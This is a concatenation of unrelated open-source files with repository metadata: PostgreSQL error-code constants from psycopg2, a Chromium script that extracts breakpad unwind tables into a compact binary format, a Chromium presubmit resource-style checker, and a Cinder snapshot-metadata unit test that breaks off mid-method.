NO_ACTIVE_SQL_TRANSACTION_FOR_BRANCH_TRANSACTION = '25005'
READ_ONLY_SQL_TRANSACTION = '25006'
SCHEMA_AND_DATA_STATEMENT_MIXING_NOT_SUPPORTED = '25007'
HELD_CURSOR_REQUIRES_SAME_ISOLATION_LEVEL = '25008'
NO_ACTIVE_SQL_TRANSACTION = '25P01'
IN_FAILED_SQL_TRANSACTION = '25P02'
IDLE_IN_TRANSACTION_SESSION_TIMEOUT = '25P03'
# Class 26 - Invalid SQL Statement Name
INVALID_SQL_STATEMENT_NAME = '26000'
# Class 27 - Triggered Data Change Violation
TRIGGERED_DATA_CHANGE_VIOLATION = '27000'
# Class 28 - Invalid Authorization Specification
INVALID_AUTHORIZATION_SPECIFICATION = '28000'
INVALID_PASSWORD = '28P01'
# Class 2B - Dependent Privilege Descriptors Still Exist
DEPENDENT_PRIVILEGE_DESCRIPTORS_STILL_EXIST = '2B000'
DEPENDENT_OBJECTS_STILL_EXIST = '2BP01'
# Class 2D - Invalid Transaction Termination
INVALID_TRANSACTION_TERMINATION = '2D000'
# Class 2F - SQL Routine Exception
SQL_ROUTINE_EXCEPTION = '2F000'
MODIFYING_SQL_DATA_NOT_PERMITTED = '2F002'
PROHIBITED_SQL_STATEMENT_ATTEMPTED = '2F003'
READING_SQL_DATA_NOT_PERMITTED = '2F004'
FUNCTION_EXECUTED_NO_RETURN_STATEMENT = '2F005'
# Class 34 - Invalid Cursor Name
INVALID_CURSOR_NAME = '34000'
# Class 38 - External Routine Exception
EXTERNAL_ROUTINE_EXCEPTION = '38000'
CONTAINING_SQL_NOT_PERMITTED = '38001'
MODIFYING_SQL_DATA_NOT_PERMITTED = '38002'
PROHIBITED_SQL_STATEMENT_ATTEMPTED = '38003'
READING_SQL_DATA_NOT_PERMITTED = '38004'
# Class 39 - External Routine Invocation Exception
EXTERNAL_ROUTINE_INVOCATION_EXCEPTION = '39000'
INVALID_SQLSTATE_RETURNED = '39001'
NULL_VALUE_NOT_ALLOWED = '39004'
TRIGGER_PROTOCOL_VIOLATED = '39P01'
SRF_PROTOCOL_VIOLATED = '39P02'
EVENT_TRIGGER_PROTOCOL_VIOLATED = '39P03'
# Class 3B - Savepoint Exception
SAVEPOINT_EXCEPTION = '3B000'
INVALID_SAVEPOINT_SPECIFICATION = '3B001'
# Class 3D - Invalid Catalog Name
INVALID_CATALOG_NAME = '3D000'
# Class 3F - Invalid Schema Name
INVALID_SCHEMA_NAME = '3F000'
# Class 40 - Transaction Rollback
TRANSACTION_ROLLBACK = '40000'
SERIALIZATION_FAILURE = '40001'
TRANSACTION_INTEGRITY_CONSTRAINT_VIOLATION = '40002'
STATEMENT_COMPLETION_UNKNOWN = '40003'
DEADLOCK_DETECTED = '40P01'
# Class 42 - Syntax Error or Access Rule Violation
SYNTAX_ERROR_OR_ACCESS_RULE_VIOLATION = '42000'
INSUFFICIENT_PRIVILEGE = '42501'
SYNTAX_ERROR = '42601'
INVALID_NAME = '42602'
INVALID_COLUMN_DEFINITION = '42611'
NAME_TOO_LONG = '42622'
DUPLICATE_COLUMN = '42701'
AMBIGUOUS_COLUMN = '42702'
UNDEFINED_COLUMN = '42703'
UNDEFINED_OBJECT = '42704'
DUPLICATE_OBJECT = '42710'
DUPLICATE_ALIAS = '42712'
DUPLICATE_FUNCTION = '42723'
AMBIGUOUS_FUNCTION = '42725'
GROUPING_ERROR = '42803'
DATATYPE_MISMATCH = '42804'
WRONG_OBJECT_TYPE = '42809'
INVALID_FOREIGN_KEY = '42830'
CANNOT_COERCE = '42846'
UNDEFINED_FUNCTION = '42883'
GENERATED_ALWAYS = '428C9'
RESERVED_NAME = '42939'
UNDEFINED_TABLE = '42P01'
UNDEFINED_PARAMETER = '42P02'
DUPLICATE_CURSOR = '42P03'
DUPLICATE_DATABASE = '42P04'
DUPLICATE_PREPARED_STATEMENT = '42P05'
DUPLICATE_SCHEMA = '42P06'
DUPLICATE_TABLE = '42P07'
AMBIGUOUS_PARAMETER = '42P08'
AMBIGUOUS_ALIAS = '42P09'
INVALID_COLUMN_REFERENCE = '42P10'
INVALID_CURSOR_DEFINITION = '42P11'
INVALID_DATABASE_DEFINITION = '42P12'
INVALID_FUNCTION_DEFINITION = '42P13'
INVALID_PREPARED_STATEMENT_DEFINITION = '42P14'
INVALID_SCHEMA_DEFINITION = '42P15'
INVALID_TABLE_DEFINITION = '42P16'
INVALID_OBJECT_DEFINITION = '42P17'
INDETERMINATE_DATATYPE = '42P18'
INVALID_RECURSION = '42P19'
WINDOWING_ERROR = '42P20'
COLLATION_MISMATCH = '42P21'
INDETERMINATE_COLLATION = '42P22'
# Class 44 - WITH CHECK OPTION Violation
WITH_CHECK_OPTION_VIOLATION = '44000'
# Class 53 - Insufficient Resources
INSUFFICIENT_RESOURCES = '53000'
DISK_FULL = '53100'
OUT_OF_MEMORY = '53200'
TOO_MANY_CONNECTIONS = '53300'
CONFIGURATION_LIMIT_EXCEEDED = '53400'
# Class 54 - Program Limit Exceeded
PROGRAM_LIMIT_EXCEEDED = '54000'
STATEMENT_TOO_COMPLEX = '54001'
TOO_MANY_COLUMNS = '54011'
TOO_MANY_ARGUMENTS = '54023'
# Class 55 - Object Not In Prerequisite State
OBJECT_NOT_IN_PREREQUISITE_STATE = '55000'
OBJECT_IN_USE = '55006'
CANT_CHANGE_RUNTIME_PARAM = '55P02'
LOCK_NOT_AVAILABLE = '55P03'
UNSAFE_NEW_ENUM_VALUE_USAGE = '55P04'
# Class 57 - Operator Intervention
OPERATOR_INTERVENTION = '57000'
QUERY_CANCELED = '57014'
ADMIN_SHUTDOWN = '57P01'
CRASH_SHUTDOWN = '57P02'
CANNOT_CONNECT_NOW = '57P03'
DATABASE_DROPPED = '57P04'
# Class 58 - System Error (errors external to PostgreSQL itself)
SYSTEM_ERROR = '58000'
IO_ERROR = '58030'
UNDEFINED_FILE = '58P01'
DUPLICATE_FILE = '58P02'
# Class 72 - Snapshot Failure
SNAPSHOT_TOO_OLD = '72000'
# Class F0 - Configuration File Error
CONFIG_FILE_ERROR = 'F0000'
LOCK_FILE_EXISTS = 'F0001'
# Class HV - Foreign Data Wrapper Error (SQL/MED)
FDW_ERROR = 'HV000'
FDW_OUT_OF_MEMORY = 'HV001'
FDW_DYNAMIC_PARAMETER_VALUE_NEEDED = 'HV002'
FDW_INVALID_DATA_TYPE = 'HV004'
FDW_COLUMN_NAME_NOT_FOUND = 'HV005'
FDW_INVALID_DATA_TYPE_DESCRIPTORS = 'HV006'
FDW_INVALID_COLUMN_NAME = 'HV007'
FDW_INVALID_COLUMN_NUMBER = 'HV008'
FDW_INVALID_USE_OF_NULL_POINTER = 'HV009'
FDW_INVALID_STRING_FORMAT = 'HV00A'
FDW_INVALID_HANDLE = 'HV00B'
FDW_INVALID_OPTION_INDEX = 'HV00C'
FDW_INVALID_OPTION_NAME = 'HV00D'
FDW_OPTION_NAME_NOT_FOUND = 'HV00J'
FDW_REPLY_HANDLE = 'HV00K'
FDW_UNABLE_TO_CREATE_EXECUTION = 'HV00L'
FDW_UNABLE_TO_CREATE_REPLY = 'HV00M'
FDW_UNABLE_TO_ESTABLISH_CONNECTION = 'HV00N'
FDW_NO_SCHEMAS = 'HV00P'
FDW_SCHEMA_NOT_FOUND = 'HV00Q'
FDW_TABLE_NOT_FOUND = 'HV00R'
FDW_FUNCTION_SEQUENCE_ERROR = 'HV010'
FDW_TOO_MANY_HANDLES = 'HV014'
FDW_INCONSISTENT_DESCRIPTOR_INFORMATION = 'HV021'
FDW_INVALID_ATTRIBUTE_VALUE = 'HV024'
FDW_INVALID_STRING_LENGTH_OR_BUFFER_LENGTH = 'HV090'
FDW_INVALID_DESCRIPTOR_FIELD_IDENTIFIER = 'HV091'
# Class P0 - PL/pgSQL Error
PLPGSQL_ERROR = 'P0000'
RAISE_EXCEPTION = 'P0001'
NO_DATA_FOUND = 'P0002'
TOO_MANY_ROWS = 'P0003'
ASSERT_FAILURE = 'P0004'
# Class XX - Internal Error
INTERNAL_ERROR = 'XX000'
DATA_CORRUPTED = 'XX001'
INDEX_CORRUPTED = 'XX002'
| {
"content_hash": "b02660e27367b347586dc48a210a32ad",
"timestamp": "",
"source": "github",
"line_count": 428,
"max_line_length": 73,
"avg_line_length": 31.507009345794394,
"alnum_prop": 0.7517241379310344,
"repo_name": "bcarroll/authmgr",
"id": "b8742f52a2f74fb0581f7d2906c8dc0832f6cefd",
"size": "13485",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "python-3.6.2-Win64/Lib/site-packages/psycopg2/errorcodes.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "2105"
},
{
"name": "C",
"bytes": "470753"
},
{
"name": "C++",
"bytes": "139524"
},
{
"name": "CSS",
"bytes": "19326"
},
{
"name": "HTML",
"bytes": "54046"
},
{
"name": "JavaScript",
"bytes": "221397"
},
{
"name": "Mako",
"bytes": "9524"
},
{
"name": "PowerShell",
"bytes": "8175"
},
{
"name": "Python",
"bytes": "13215056"
},
{
"name": "Tcl",
"bytes": "1295070"
}
],
"symlink_target": ""
} |
"""Extracts the unwind tables in from breakpad symbol files
Runs dump_syms on the given binary file and extracts the CFI data into the
given output file.
The output file is a binary file containing CFI rows ordered based on function
address. The output file only contains rows that match the most popular rule
type in CFI table, to reduce the output size and specify data in compact format.
See doc https://github.com/google/breakpad/blob/master/docs/symbol_files.md.
1. The CFA rules should be of postfix form "SP <val> +".
2. The RA rules should be of postfix form "CFA <val> + ^".
Note: breakpad represents dereferencing address with '^' operator.
The output file has 2 tables UNW_INDEX and UNW_DATA, inspired from ARM EHABI
format. The first table contains function addresses and an index into the
UNW_DATA table. The second table contains one or more rows for the function
unwind information.
The output file starts with 4 bytes counting the number of entries in UNW_INDEX.
Then UNW_INDEX table and UNW_DATA table.
UNW_INDEX contains two columns of N rows each, where N is the number of
functions.
1. First column 4 byte rows of all the function start address as offset from
start of the binary, in sorted order.
2. For each function addr, the second column contains 2 byte indices in order.
The indices are offsets (in count of 2 bytes) of the CFI data from start of
UNW_DATA.
The last entry in the table always contains CANT_UNWIND index to specify the
end address of the last function.
UNW_DATA contains data of all the functions. Each function data contains N rows.
The data found at the address pointed from UNW_INDEX will be:
2 bytes: N - number of rows that belong to current function.
N * 4 bytes: N rows of data. 16 bits : Address offset from function start.
14 bits : CFA offset / 4.
2 bits : RA offset / 4.
The function is not added to the unwind table in following conditions:
C1. If length of the function code (number of instructions) is greater than
0xFFFF (2 byte address span). This is because we use 16 bits to refer to
offset of instruction from start of the address.
C2. If the function moves the SP by more than 0xFFFF bytes. This is because we
use 14 bits to denote CFA offset (last 2 bits are 0).
C3. If the Return Address is stored at an offset >= 16 from the CFA. Some
functions which have variable arguments can have offset upto 16.
TODO(ssid): We can actually store offset 16 by subtracting 1 from RA/4 since
we never have 0.
C4: Some functions do not have unwind information defined in dwarf info. These
functions have index value CANT_UNWIND(0xFFFF) in UNW_INDEX table.
Usage:
extract_unwind_tables.py --input_path [root path to unstripped chrome.so]
--output_path [output path] --dump_syms_path [path to dump_syms binary]
"""
import argparse
import re
import struct
import subprocess
import sys
import tempfile
_CFA_REG = '.cfa'
_RA_REG = '.ra'
_ADDR_ENTRY = 0
_LENGTH_ENTRY = 1
_CANT_UNWIND = 0xFFFF
def _Write4Bytes(output_file, val):
"""Writes a 32 bit unsigned integer to the given output file."""
output_file.write(struct.pack('<L', val));
def _Write2Bytes(output_file, val):
"""Writes a 16 bit unsigned integer to the given output file."""
output_file.write(struct.pack('<H', val));
def _FindRuleForRegister(cfi_row, reg):
"""Returns the postfix expression as string for a given register.
Breakpad CFI row format specifies rules for unwinding each register in postfix
expression form separated by space. Each rule starts with register name and a
colon. Eg: "CFI R1: <rule> R2: <rule>".
"""
out = []
found_register = False
for part in cfi_row:
if found_register:
if part[-1] == ':':
break
out.append(part)
elif part == reg + ':':
found_register = True
return ' '.join(out)
def _GetCfaAndRaOffset(cfi_row):
"""Returns a tuple with 2 numbers (cfa_offset, ra_offset).
Returns right values if rule matches the predefined criteria. Returns (0, 0)
otherwise. The criteria for CFA rule is postfix form "SP <val> +" and RA rule
is postfix form "CFA -<val> + ^".
"""
cfa_offset = 0
ra_offset = 0
cfa_rule = _FindRuleForRegister(cfi_row, _CFA_REG)
ra_rule = _FindRuleForRegister(cfi_row, _RA_REG)
if cfa_rule and re.match(r'sp [0-9]+ \+', cfa_rule):
cfa_offset = int(cfa_rule.split()[1], 10)
if ra_rule:
if not re.match(r'.cfa -[0-9]+ \+ \^', ra_rule):
return (0, 0)
ra_offset = -1 * int(ra_rule.split()[1], 10)
return (cfa_offset, ra_offset)
def _GetAllCfiRows(symbol_file):
"""Returns parsed CFI data from given symbol_file.
Each entry in the cfi data dictionary returned is a map from function start
address to array of function rows, starting with FUNCTION type, followed by
one or more CFI rows.
"""
cfi_data = {}
current_func = []
for line in symbol_file:
line = line.decode('utf8')
if 'STACK CFI' not in line:
continue
parts = line.split()
data = {}
if parts[2] == 'INIT':
# Add the previous function to the output
if len(current_func) > 1:
cfi_data[current_func[0][_ADDR_ENTRY]] = current_func
current_func = []
# The function line is of format "STACK CFI INIT <addr> <length> ..."
data[_ADDR_ENTRY] = int(parts[3], 16)
data[_LENGTH_ENTRY] = int(parts[4], 16)
# Condition C1: Skip if length is large.
if data[_LENGTH_ENTRY] == 0 or data[_LENGTH_ENTRY] > 0xffff:
continue # Skip the current function.
else:
# The current function is skipped.
if len(current_func) == 0:
continue
# The CFI row is of format "STACK CFI <addr> .cfa: <expr> .ra: <expr> ..."
data[_ADDR_ENTRY] = int(parts[2], 16)
(data[_CFA_REG], data[_RA_REG]) = _GetCfaAndRaOffset(parts)
# Condition C2 and C3: Skip based on limits on offsets.
if data[_CFA_REG] == 0 or data[_RA_REG] >= 16 or data[_CFA_REG] > 0xffff:
current_func = []
continue
assert data[_CFA_REG] % 4 == 0
# Since we skipped functions with code size larger than 0xffff, we should
# have no function offset larger than the same value.
assert data[_ADDR_ENTRY] - current_func[0][_ADDR_ENTRY] < 0xffff
if data[_ADDR_ENTRY] == 0:
# Skip current function, delete all previous entries.
current_func = []
continue
assert data[_ADDR_ENTRY] % 2 == 0
current_func.append(data)
# Condition C4: Skip function without CFI rows.
if len(current_func) > 1:
cfi_data[current_func[0][_ADDR_ENTRY]] = current_func
return cfi_data
def _WriteCfiData(cfi_data, out_file):
"""Writes the CFI data in defined format to out_file."""
# Stores the final data that will be written to UNW_DATA table, in order
# with 2 byte items.
unw_data = []
# Represent all the CFI data of functions as set of numbers and map them to an
# index in the |unw_data|. This index is later written to the UNW_INDEX table
# for each function. This map is used to find index of the data for functions.
data_to_index = {}
# Store mapping between the functions to the index.
func_addr_to_index = {}
previous_func_end = 0
for addr, function in sorted(cfi_data.items()):
# Add an empty function entry when functions CFIs are missing between 2
# functions.
if previous_func_end != 0 and addr - previous_func_end > 4:
func_addr_to_index[previous_func_end + 2] = _CANT_UNWIND
previous_func_end = addr + cfi_data[addr][0][_LENGTH_ENTRY]
assert len(function) > 1
func_data_arr = []
func_data = 0
# The first row contains the function address and length. The rest of the
# rows have CFI data. Create function data array as given in the format.
for row in function[1:]:
addr_offset = row[_ADDR_ENTRY] - addr
cfa_offset = (row[_CFA_REG]) | (row[_RA_REG] // 4)
func_data_arr.append(addr_offset)
func_data_arr.append(cfa_offset)
# Consider all the rows in the data as one large integer and add it as a key
# to the |data_to_index|.
for data in func_data_arr:
func_data = (func_data << 16) | data
row_count = len(func_data_arr) // 2
if func_data not in data_to_index:
# When data is not found, create a new index = len(unw_data), and write
# the data to |unw_data|.
index = len(unw_data)
data_to_index[func_data] = index
unw_data.append(row_count)
for row in func_data_arr:
unw_data.append(row)
else:
# If the data was found, then use the same index for the function.
index = data_to_index[func_data]
assert row_count == unw_data[index]
func_addr_to_index[addr] = data_to_index[func_data]
# Mark the end end of last function entry.
func_addr_to_index[previous_func_end + 2] = _CANT_UNWIND
# Write the size of UNW_INDEX file in bytes.
_Write4Bytes(out_file, len(func_addr_to_index))
# Write the UNW_INDEX table. First list of addresses and then indices.
sorted_unw_index = sorted(func_addr_to_index.items())
for addr, index in sorted_unw_index:
_Write4Bytes(out_file, addr)
for addr, index in sorted_unw_index:
_Write2Bytes(out_file, index)
# Write the UNW_DATA table.
for data in unw_data:
_Write2Bytes(out_file, data)
def _ParseCfiData(sym_stream, output_path):
cfi_data = _GetAllCfiRows(sym_stream)
with open(output_path, 'wb') as out_file:
_WriteCfiData(cfi_data, out_file)
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--input_path', required=True,
help='The input path of the unstripped binary')
parser.add_argument(
'--output_path', required=True,
help='The path of the output file')
parser.add_argument(
'--dump_syms_path', required=True,
help='The path of the dump_syms binary')
args = parser.parse_args()
cmd = ['./' + args.dump_syms_path, args.input_path]
proc = subprocess.Popen(cmd, bufsize=-1, stdout=subprocess.PIPE)
_ParseCfiData(proc.stdout, args.output_path)
assert proc.wait() == 0
return 0
if __name__ == '__main__':
sys.exit(main())
| {
"content_hash": "171ce2c200e928fdaa88a7fcb3fa7a9c",
"timestamp": "",
"source": "github",
"line_count": 280,
"max_line_length": 80,
"avg_line_length": 36.375,
"alnum_prop": 0.6745213549337261,
"repo_name": "youtube/cobalt_sandbox",
"id": "25c3130e635385d9dd527ed9276d9f0f4f458204",
"size": "10371",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "build/android/gyp/extract_unwind_tables.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""
Presubmit for Chromium HTML/CSS/JS resources. See chrome/browser/PRESUBMIT.py.
"""
from . import regex_check
class ResourceChecker(object):
def __init__(self, input_api, output_api, file_filter=None):
self.input_api = input_api
self.output_api = output_api
self.file_filter = file_filter
def DeprecatedMojoBindingsCheck(self, line_number, line):
return regex_check.RegexCheck(self.input_api.re, line_number, line,
'(mojo_bindings\.js)', 'Please use mojo_bindings_lite.js in new code')
def DisallowIncludeCheck(self, msg, line_number, line):
return regex_check.RegexCheck(self.input_api.re, line_number, line,
'^\s*(?:\/[\*\/])?\s*(<include)\s*src=', msg)
# This is intentionally not included in RunChecks(). It's an optional check
# that can be used from a PRESUBMIT.py in a directory that does not wish to
# use <include> (i.e. uses a different bundling mechanism, does not grit
# process, etc.).
def DisallowIncludes(self, msg):
check = lambda *args: self.DisallowIncludeCheck(msg, *args)
return self._RunCheckOnAffectedFiles(check, 'Found resource errors in %s',
is_error=True)
def SelfClosingIncludeCheck(self, line_number, line):
return regex_check.RegexCheck(self.input_api.re, line_number, line,
'(</include>|<include.*/>)', 'Closing <include> tags is unnecessary.')
def RunChecks(self):
msg = 'Found resources style issues in %s'
# TODO(crbug.com/931798): is_error for Mojo check when -lite is majority?
return self._RunCheckOnAffectedFiles(self.DeprecatedMojoBindingsCheck,
msg, only_changed_lines=True) + \
self._RunCheckOnAffectedFiles(self.SelfClosingIncludeCheck, msg)
def _RunCheckOnAffectedFiles(self, check, msg_template, is_error=False,
only_changed_lines=False):
"""Check for violations of the Chromium web development style guide. See
https://chromium.googlesource.com/chromium/src/+/main/styleguide/web/web.md
"""
results = []
affected_files= self.input_api.AffectedFiles(file_filter=self.file_filter,
include_deletes=False)
for f in affected_files:
errors = []
if only_changed_lines:
contents = f.ChangedContents()
else:
contents = enumerate(f.NewContents(), start=1)
for line_number, line in contents:
error = check(line_number, line)
if error:
errors.append(error)
if errors:
abs_local_path = f.AbsoluteLocalPath()
msg = msg_template % abs_local_path + '\n\n' + '\n'.join(errors) + '\n'
if is_error:
results.append(self.output_api.PresubmitError(msg))
else:
results.append(self.output_api.PresubmitPromptWarning(msg))
return results
| {
"content_hash": "5a0baeabb5e1ad019999e32b62958317",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 82,
"avg_line_length": 40.77142857142857,
"alnum_prop": 0.6527680448493343,
"repo_name": "chromium/chromium",
"id": "8365d9bbc87b7942d0a5c0fe474322b5b1d0df12",
"size": "2995",
"binary": false,
"copies": "7",
"ref": "refs/heads/main",
"path": "tools/web_dev_style/resource_checker.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
import uuid
from oslo_config import cfg
from oslo_serialization import jsonutils
import webob
from cinder.api import extensions
from cinder.api.v2 import snapshot_metadata
from cinder.api.v2 import snapshots
import cinder.db
from cinder import exception
from cinder import test
from cinder.tests.api import fakes
CONF = cfg.CONF
def return_create_snapshot_metadata_max(context,
snapshot_id,
metadata,
delete):
return stub_max_snapshot_metadata()
def return_create_snapshot_metadata(context, snapshot_id, metadata, delete):
return stub_snapshot_metadata()
def return_create_snapshot_metadata_insensitive(context, snapshot_id,
metadata, delete):
return stub_snapshot_metadata_insensitive()
def return_new_snapshot_metadata(context, snapshot_id, metadata, delete):
return stub_new_snapshot_metadata()
def return_snapshot_metadata(context, snapshot_id):
if not isinstance(snapshot_id, str) or not len(snapshot_id) == 36:
msg = 'id %s must be a uuid in return snapshot metadata' % snapshot_id
raise Exception(msg)
return stub_snapshot_metadata()
def return_empty_snapshot_metadata(context, snapshot_id):
return {}
def return_empty_container_metadata(context, snapshot_id, metadata, delete):
return {}
def delete_snapshot_metadata(context, snapshot_id, key):
pass
def stub_snapshot_metadata():
metadata = {
"key1": "value1",
"key2": "value2",
"key3": "value3",
}
return metadata
def stub_snapshot_metadata_insensitive():
metadata = {
"key1": "value1",
"key2": "value2",
"key3": "value3",
"KEY4": "value4",
}
return metadata
def stub_new_snapshot_metadata():
metadata = {
'key10': 'value10',
'key99': 'value99',
'KEY20': 'value20',
}
return metadata
def stub_max_snapshot_metadata():
metadata = {"metadata": {}}
for num in range(CONF.quota_metadata_items):
metadata['metadata']['key%i' % num] = "blah"
return metadata
def return_snapshot(context, snapshot_id):
return {'id': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'status': 'available',
'metadata': {}}
def return_volume(context, volume_id):
return {'id': 'fake-vol-id',
'size': 100,
'name': 'fake',
'host': 'fake-host',
'status': 'available',
'encryption_key_id': None,
'volume_type_id': None,
'migration_status': None,
'metadata': {},
'project_id': context.project_id}
def return_snapshot_nonexistent(context, snapshot_id):
raise exception.SnapshotNotFound(snapshot_id=snapshot_id)
def fake_update_snapshot_metadata(self, context, snapshot, diff):
pass
class SnapshotMetaDataTest(test.TestCase):
def setUp(self):
super(SnapshotMetaDataTest, self).setUp()
self.volume_api = cinder.volume.api.API()
self.stubs.Set(cinder.db, 'volume_get', return_volume)
self.stubs.Set(cinder.db, 'snapshot_get', return_snapshot)
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_snapshot_metadata)
self.stubs.Set(self.volume_api, 'update_snapshot_metadata',
fake_update_snapshot_metadata)
self.ext_mgr = extensions.ExtensionManager()
self.ext_mgr.extensions = {}
self.snapshot_controller = snapshots.SnapshotsController(self.ext_mgr)
self.controller = snapshot_metadata.Controller()
self.req_id = str(uuid.uuid4())
self.url = '/v2/fake/snapshots/%s/metadata' % self.req_id
snap = {"volume_size": 100,
"volume_id": "fake-vol-id",
"display_name": "Volume Test Name",
"display_description": "Volume Test Desc",
"availability_zone": "zone1:host1",
"host": "fake-host",
"metadata": {}}
body = {"snapshot": snap}
req = fakes.HTTPRequest.blank('/v2/snapshots')
self.snapshot_controller.create(req, body)
def test_index(self):
req = fakes.HTTPRequest.blank(self.url)
res_dict = self.controller.index(req, self.req_id)
expected = {
'metadata': {
'key1': 'value1',
'key2': 'value2',
'key3': 'value3',
},
}
self.assertEqual(expected, res_dict)
def test_index_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_snapshot_nonexistent)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.index, req, self.url)
def test_index_no_data(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_empty_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
res_dict = self.controller.index(req, self.req_id)
expected = {'metadata': {}}
self.assertEqual(expected, res_dict)
def test_show(self):
req = fakes.HTTPRequest.blank(self.url + '/key2')
res_dict = self.controller.show(req, self.req_id, 'key2')
expected = {'meta': {'key2': 'value2'}}
self.assertEqual(expected, res_dict)
def test_show_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_snapshot_nonexistent)
req = fakes.HTTPRequest.blank(self.url + '/key2')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.req_id, 'key2')
def test_show_meta_not_found(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_empty_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key6')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.req_id, 'key6')
def test_delete(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_snapshot_metadata)
self.stubs.Set(cinder.db, 'snapshot_metadata_delete',
delete_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key2')
req.method = 'DELETE'
res = self.controller.delete(req, self.req_id, 'key2')
self.assertEqual(200, res.status_int)
def test_delete_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_get',
return_snapshot_nonexistent)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.req_id, 'key1')
def test_delete_meta_not_found(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_empty_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key6')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.req_id, 'key6')
def test_create(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_empty_snapshot_metadata)
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank('/v2/snapshot_metadata')
req.method = 'POST'
req.content_type = "application/json"
body = {"metadata": {"key1": "value1",
"key2": "value2",
"key3": "value3"}}
req.body = jsonutils.dumps(body)
res_dict = self.controller.create(req, self.req_id, body)
self.assertEqual(body, res_dict)
def test_create_with_keys_in_uppercase_and_lowercase(self):
# if the keys in uppercase_and_lowercase, should return the one
# which server added
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_empty_snapshot_metadata)
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata_insensitive)
req = fakes.HTTPRequest.blank('/v2/snapshot_metadata')
req.method = 'POST'
req.content_type = "application/json"
body = {"metadata": {"key1": "value1",
"KEY1": "value1",
"key2": "value2",
"KEY2": "value2",
"key3": "value3",
"KEY4": "value4"}}
expected = {"metadata": {"key1": "value1",
"key2": "value2",
"key3": "value3",
"KEY4": "value4"}}
req.body = jsonutils.dumps(body)
res_dict = self.controller.create(req, self.req_id, body)
self.assertEqual(expected, res_dict)
def test_create_empty_body(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.req_id, None)
def test_create_item_empty_key(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.req_id, body)
def test_create_item_key_too_long(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create,
req, self.req_id, body)
def test_create_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_get',
return_snapshot_nonexistent)
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_snapshot_metadata)
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank('/v2/snapshot_metadata')
req.method = 'POST'
req.content_type = "application/json"
body = {"metadata": {"key9": "value9"}}
req.body = jsonutils.dumps(body)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.create, req, self.req_id, body)
def test_update_all(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_new_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {
'metadata': {
'key10': 'value10',
'key99': 'value99',
'KEY20': 'value20',
},
}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.req_id, expected)
self.assertEqual(expected, res_dict)
def test_update_all_with_keys_in_uppercase_and_lowercase(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_get',
return_create_snapshot_metadata)
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_new_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
body = {
'metadata': {
'key10': 'value10',
'KEY10': 'value10',
'key99': 'value99',
'KEY20': 'value20',
},
}
expected = {
'metadata': {
'key10': 'value10',
'key99': 'value99',
'KEY20': 'value20',
},
}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.req_id, body)
self.assertEqual(expected, res_dict)
def test_update_all_empty_container(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_empty_container_metadata)
